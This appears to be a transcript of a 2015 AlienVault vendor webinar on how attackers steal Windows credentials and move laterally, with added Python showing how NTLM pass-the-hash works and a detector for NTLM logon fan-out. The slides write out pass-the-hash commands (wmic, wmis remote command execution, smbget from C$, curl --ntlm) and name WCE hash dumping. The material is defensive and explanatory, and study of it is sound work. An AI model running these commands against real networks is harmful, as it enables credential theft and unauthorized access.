
Attackers Move Stealthily Around Networks - And How To Detect Them

Date post: 15-Jan-2015
Upload: alienvault
Description:
Have you ever wondered how the bad guys actually get control of a system? Or what they do next to move about the network undetected? Then you won't want to miss this live demo, where AlienVault security guru Tom D'Aquino will show you how attackers take over a system, then use that compromised device to "land and expand", gathering user credentials and valuable data as they move further into your network. Using a real-world example of malware planted via a watering hole attack, Tom will show you how AlienVault USM detects these nefarious activities every step of the way. You'll learn:
• How attackers take control of systems and steal user credentials
• What they do next to avoid detection and move around the network
• How to detect them before the damage is done with AlienVault USM
Transcript

Live Demo: Get Complete Security Visibility in Under 1 Hour

@AlienVault

About AlienVault

AlienVault has unified the security products, intelligence and community essential for mid-sized businesses to defend against today's modern threats.


Agenda

• The breach: common ways attackers get in
• What they do next to infiltrate the network
• Why detecting their movements is tricky
• Demo: How to detect attackers moving stealthily around your network with AlienVault USM


The Breach

• Client-side vulnerabilities exploited by:
  - Malicious website, e.g. watering hole attacks
  - Malicious email attachment
• Gives attackers access to the local system with the privileges of the local user


What happens next

• Grab credentials of cached users
• Browse the domain
• Exfiltrate data


But how is this possible?

Windows Credentials Editor (WCE)
Allows an attacker to list Windows logon sessions and add, change, list and delete the credentials associated with them:
• Pass-the-hash on Windows machines
• Grab NTLM hashes from memory, where Windows keeps them for single sign-on
• Grab Kerberos tickets from Windows machines
• Dump cleartext passwords stored by Windows authentication packages


But how is this possible?

Pass the Hash: using credentials in crafty ways (WMIC)
• WMIC (Windows Management Instrumentation Command-line): here the Linux wmic client shipped with the pass-the-hash toolkit, which accepts an NTLM hash in place of the password after the % in -U
  - Used to issue WMI queries, e.g. listing the running processes on a remote host:
  - wmic -U demo/administrator%hash //172.16.1.1 "select csname,name,processid,sessionid from win32_process"


But how is this possible?

Pass the Hash: using credentials in crafty ways (WMIS)
• WMIS, the companion WMI tool in the same toolkit, creates processes on the remote host
  - Can be used to run arbitrary commands; the sky is the limit with this attack vector
  - wmis -U demo/administrator%hash //172.16.1.1 'cmd.exe /c dir c:\ > c:\windows\temp\blog.txt'

But how is this possible?


But how is this possible?

Pass the Hash: using credentials in crafty ways (SMBGET)
• SMBGET can pull files from a Windows share using the hash as the password, here retrieving the output written by the previous command
  - smbget -w demo -u demo\\administrator -O -p <hash> smb://172.16.1.1/c$/windows/temp/blog.txt

But how is this possible?


But how is this possible?

Pass the Hash: using credentials in crafty ways (CURL)
• Pass the hash and we can view the default SharePoint page, logged in as john.smith
  - curl --ntlm -u john.smith:<hash> http://intranet.demo.local/Pages/Default.aspx
  - This relies on the toolkit's patched curl; a stock curl treats the text after the colon as a plaintext password and hashes it again

But how is this possible?


But how is this possible?

Pass-the-Hash Toolkit
• There is also a toolkit for Windows with several pass-the-hash utilities
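Why a hash alone is enough to log in, as an added example that is not from the webinar or from AlienVault. NTLM never sends the password: the client proves it holds the NT hash (MD4 of the UTF-16LE password) by keying an HMAC-MD5 over the server's challenge (the NTLMv2 computation from MS-NLMP), so whoever lifted that hash from memory produces exactly the proof the real user would. The MD4 routine is written out in pure Python because OpenSSL 3 builds of hashlib often omit it; the password, account names, server challenge and client blob are constructed test values, and pth_credential builds the DOMAIN/user%LMHASH:NTHASH string that the pass-the-hash toolkit's -U option takes (the LM half is the fixed empty-password value, since current Windows hosts do not store LM hashes).

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password


def _lrot(x: int, n: int) -> int:
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is a legacy algorithm that
    many OpenSSL 3 builds disable, so it is implemented here."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    k2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    k3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F(b, c, d) = (b & c) | (~b & d)
            a = _lrot(a + ((b & c) | (~b & d)) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G = majority(b, c, d)
            a = _lrot(a + ((b & c) | (b & d) | (c & d)) + x[k2[i]] + 0x5A827999,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H = b ^ c ^ d
            a = _lrot(a + (b ^ c ^ d) + x[k3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash: unsalted MD4 over the UTF-16LE password. This is the value WCE dumps
    and the value the toolkit passes; nothing else about the password is needed."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes,
                 client_blob: bytes) -> bytes:
    """NTProofStr from MS-NLMP: the 16 bytes the client sends to prove it holds the
    NT hash. Only the hash enters the computation, never the password."""
    ntowf_v2 = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"),
                        hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + client_blob, hashlib.md5).digest()


def pth_credential(domain: str, user: str, nt_hex: str) -> str:
    """Credential string for the toolkit's -U option: DOMAIN/user%LMHASH:NTHASH."""
    return f"{domain}/{user}%{EMPTY_LM_HASH}:{nt_hex}"


if __name__ == "__main__":
    # Constructed values: a weak victim password, the hash WCE would show for it,
    # and a server challenge / client blob as they appear in an NTLM exchange.
    stolen_hex = "8846f7eaee8fb117ad06bdd830b7586c"  # NT hash of "password"
    challenge, blob = bytes.fromhex("0123456789abcdef"), bytes(range(32))
    print("NT hash of 'password':", nt_hash("password").hex())
    print("proof from password :",
          ntlmv2_proof(nt_hash("password"), "john.smith", "DEMO", challenge, blob).hex())
    print("proof from hash only:",
          ntlmv2_proof(bytes.fromhex(stolen_hex), "john.smith", "DEMO", challenge, blob).hex())
    print("-U value for the toolkit:", pth_credential("demo", "administrator", stolen_hex))
```

The two proof lines match, which is the whole of pass-the-hash: the server cannot tell a client that knows the password from one that only knows its MD4. It also shows why the fix is not a stronger password but keeping the hash out of reach (no admin logons on workstations, Protected Users / Credential Guard where available) and watching for the logons the stolen hash produces.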


How do you detect this?

Tricky to detect because…

Firewall won't catch it
• Exploiting client-side vulnerabilities causes the victim's machine to initiate a connection back to the attacker's server, so the traffic is outbound, which most firewall policies allow
• The attacker's domain browsing activities also originate from the victim's machine, inside the network

Anti-virus is unlikely to catch it
• 82,000 new malware variants are released every day*

No suspicious authentication failures
• The cached credentials grabbed from memory are valid, so the attacker browses the domain without guessing passwords; every logon succeeds, and what remains is a trail of successful network logons from one workstation to many hosts

So, what will catch it? Network Intrusion Detection and effective correlation

*http://www.pcworld.com/article/2109210/report-average-of-82-000-new-malware-threats-per-day-in-2013.html
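One way the correlation the slide calls for can work, as an added example (this is my code, not an AlienVault USM rule, and the log lines are constructed, not real events). Pass-the-hash over WMI or SMB leaves successful network logons on each target (Windows Security event 4624, logon type 3) that carry the NTLM authentication package, and a single workstation reusing one domain account against many hosts within a few minutes stands out even though no logon ever fails. The flattened key=value format, the DEMO domain, the 10-minute window and the three-host threshold are assumptions to tune per environment; where legacy NTLM is common the scope will need tightening.

```python
from collections import defaultdict
from datetime import datetime, timedelta

DOMAIN = "DEMO"  # assumed NetBIOS domain name of the sample environment

# Constructed sample (not real logs): Windows Security 4624 events flattened to
# key=value pairs. 172.16.1.50 plays the compromised workstation from which the
# attacker browses the domain with the stolen administrator hash.
SAMPLE_EVENTS = """\
2015-01-15T10:02:11 EventID=4624 LogonType=3 AuthPackage=NTLM Account=DEMO\\administrator SourceIP=172.16.1.50 Host=FS01
2015-01-15T10:02:40 EventID=4624 LogonType=3 AuthPackage=NTLM Account=DEMO\\administrator SourceIP=172.16.1.50 Host=DC01
2015-01-15T10:03:05 EventID=4624 LogonType=3 AuthPackage=NTLM Account=DEMO\\administrator SourceIP=172.16.1.50 Host=SP01
2015-01-15T10:03:30 EventID=4624 LogonType=3 AuthPackage=NTLM Account=DEMO\\administrator SourceIP=172.16.1.50 Host=WS07
2015-01-15T10:05:00 EventID=4624 LogonType=3 AuthPackage=Kerberos Account=DEMO\\john.smith SourceIP=172.16.1.77 Host=FS01
2015-01-15T11:30:00 EventID=4624 LogonType=3 AuthPackage=NTLM Account=DEMO\\backup.svc SourceIP=172.16.1.9 Host=FS01
"""


def parse_event(line: str) -> dict:
    """Turn one 'timestamp key=value ...' line into a dict with a parsed timestamp."""
    ts, *pairs = line.split()
    ev = dict(p.split("=", 1) for p in pairs)
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")
    return ev


def load_events(text: str) -> list:
    return [parse_event(line) for line in text.splitlines() if line.strip()]


def is_ntlm_domain_network_logon(ev: dict) -> bool:
    """A successful network logon by a domain account over NTLM: exactly what the
    pass-the-hash tools produce, and odd for a domain account where Kerberos is the
    norm. Legitimate NTLM fallback exists, so this is a signal to correlate, not an
    alert by itself. Anonymous (null-session) logons are excluded as noise."""
    account = ev.get("Account", "")
    return (ev.get("EventID") == "4624"
            and ev.get("LogonType") == "3"
            and ev.get("AuthPackage") == "NTLM"
            and account.upper().startswith(DOMAIN + "\\")
            and "ANONYMOUS LOGON" not in account.upper())


def find_lateral_movement(events, window=timedelta(minutes=10), min_hosts=3) -> list:
    """Flag (source IP, account) pairs whose NTLM network logons reach at least
    min_hosts distinct hosts inside any window-sized interval."""
    by_actor = defaultdict(list)
    for ev in events:
        if is_ntlm_domain_network_logon(ev):
            by_actor[(ev["SourceIP"], ev["Account"].lower())].append((ev["ts"], ev["Host"]))
    alerts = []
    for (source, account), logons in by_actor.items():
        logons.sort()
        for i, (start, _) in enumerate(logons):  # slide the window over the sorted logons
            hosts = {host for ts, host in logons[i:] if ts - start <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"source": source, "account": account,
                               "hosts": sorted(hosts), "start": start})
                break  # one alert per actor is enough for the analyst
    return alerts


if __name__ == "__main__":
    for alert in find_lateral_movement(load_events(SAMPLE_EVENTS)):
        print(f"{alert['start']} {alert['source']} as {alert['account']} "
              f"reached {len(alert['hosts'])} hosts: {', '.join(alert['hosts'])}")
```

On the sample the administrator fan-out from 172.16.1.50 is flagged while john.smith's Kerberos logon and the single backup.svc logon are not. In practice the same grouping can be fed from the network side as well (one workstation opening DCERPC/SMB sessions to many hosts), which is what makes the combination of IDS events and authentication logs stronger than either alone.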


USM Product Capabilities (powered by AV Labs Threat Intelligence)

ASSET DISCOVERY
• Active Network Scanning
• Passive Network Scanning
• Asset Inventory
• Host-based Software Inventory

VULNERABILITY ASSESSMENT
• Continuous Vulnerability Monitoring
• Authenticated / Unauthenticated Active Scanning

THREAT DETECTION
• Network IDS
• Host IDS
• Wireless IDS
• File Integrity Monitoring

BEHAVIORAL MONITORING
• Log Collection
• Netflow Analysis
• Service Availability Monitoring

SECURITY INTELLIGENCE
• SIEM Event Correlation
• Incident Response


Unified Security Management
Complete. Simple. Affordable.

AlienVault USM provides asset discovery, vulnerability assessment, threat detection, behavioral monitoring & SIEM in one, pre-integrated platform, plus:
• AlienVault Labs Threat Intelligence
• AlienVault Open Threat Exchange

Delivery Options: Hardware, Virtual, or Cloud-based appliances
Starting at only $3600
Open-Source version (OSSIM) also available

More Questions? Email

[email protected]

NOW FOR SOME Q&A…

Test Drive AlienVault USM: Download a Free 30-Day Trial

http://www.alienvault.com/free-trial

Try our Product Sandbox

http://www.alienvault.com/live-demo-site

